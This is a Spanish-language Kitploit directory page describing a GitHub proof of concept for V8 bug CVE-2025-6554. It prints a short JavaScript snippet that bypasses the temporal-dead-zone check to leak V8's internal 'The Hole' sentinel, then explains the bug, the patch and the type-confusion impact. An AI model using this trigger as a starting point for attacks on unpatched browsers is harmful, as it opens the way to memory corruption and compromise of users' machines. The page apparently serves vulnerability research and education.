Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-6554 — Prueba de concepto de explotación para una vulnerabilidad del motor JavaScript V8 (CVE-2025-6554) que demuestra una evasión de TDZ que filtra el centinela 'The Hole', lo que permite confusión de tipos y posible corrupción de memoria. | Kitploit
Herramientas/GitHubGitHub/pwntoday/cve-2025-6554
Análisis de VulnerabilidadesExplotaciónPapers e InvestigaciónAprendizaje y EducaciónExplotación de Binarios
GitHubpwntoday/cve-2025-6554

CVE-2025-6554

Prueba de concepto de explotación para una vulnerabilidad del motor JavaScript V8 (CVE-2025-6554) que demuestra una evasión de TDZ que filtra el centinela 'The Hole', lo que permite confusión de tipos y posible corrupción de memoria.

Ver Repositorio
23hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-6554

root@kitploit:~
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
pwn();

Bug

Se accedió a la variable y antes de su declaración. Normalmente esto debería desencadenar un ReferenceError (TDZ), pero en versiones antiguas de V8, al combinarlo con delete x?.[y], la comprobación fallaba y devolvía el valor centinela interno "The Hole".

Antes del Parche

V8 solo verificaba el TDZ una vez, y luego asumía incorrectamente que y era válida. Esto permitía que "The Hole" escapara al código de usuario.

Solución

El parche fuerza una nueva comprobación de TDZ (ThrowReferenceErrorIfHole) en cada acceso, asegurando que y antes de la inicialización siempre lance una excepción.

Impacto: Los atacantes podían capturar "The Hole" y abusar de él para confusión de tipos, trucos de pila o evasiones de ámbito.

Descargar herramienta